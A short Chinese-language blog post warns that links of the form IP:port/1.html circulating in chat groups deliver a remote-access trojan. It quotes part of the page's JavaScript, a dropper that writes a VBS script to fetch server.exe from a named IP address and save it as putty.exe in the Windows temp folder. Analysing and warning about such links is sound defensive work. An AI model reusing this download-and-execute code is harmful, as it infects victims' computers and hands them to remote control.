蝎  子:

J0e's Blog - 致力关注于网络:

        今天看到很多群都在发一些ip+端口/1.html  虽然ip跟端口不一样 

  

                 但是1.html都是一样的- - 

  

  然后发现是一段代码  运行配合远控上线   

  

                                  不多说 上截图  

  

                       

  

  

    

  

 一段 javascript的 攻击代码

  

        

  

https://103.248.36.3:4567/server.exe"",0 & echo >>C:\Windows\Temp\text.vbs xPost.Send() & echo >>C:\Windows\Temp\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>C:\Windows\Temp\text.vbs sGet.Mode=3 & echo >>C:\Windows\Temp\text.vbs sGet.Type=1 & echo >>C:\Windows\Temp\text.vbs sGet.Open() & echo >>C:\Windows\Temp\text.vbs sGet.Write xPost.ResponseBody & echo >>C:\Windows\Temp\text.vbs sGet.SaveToFile ""C:\Windows\Temp\putty.exe"",2",

  

  

  在目标地址：https://103.248.36.3:4567/server.exe

  

  下载之后  他就自动运行 server程序    但是由于网马没有免杀 

  

    被很多浏览器杀掉了    

  

  

      导致没有多少肉鸡上线       

  

  

   小乔提醒大家：

  

                                不要遇到什么链接都去打开    有时候被坑了都不知道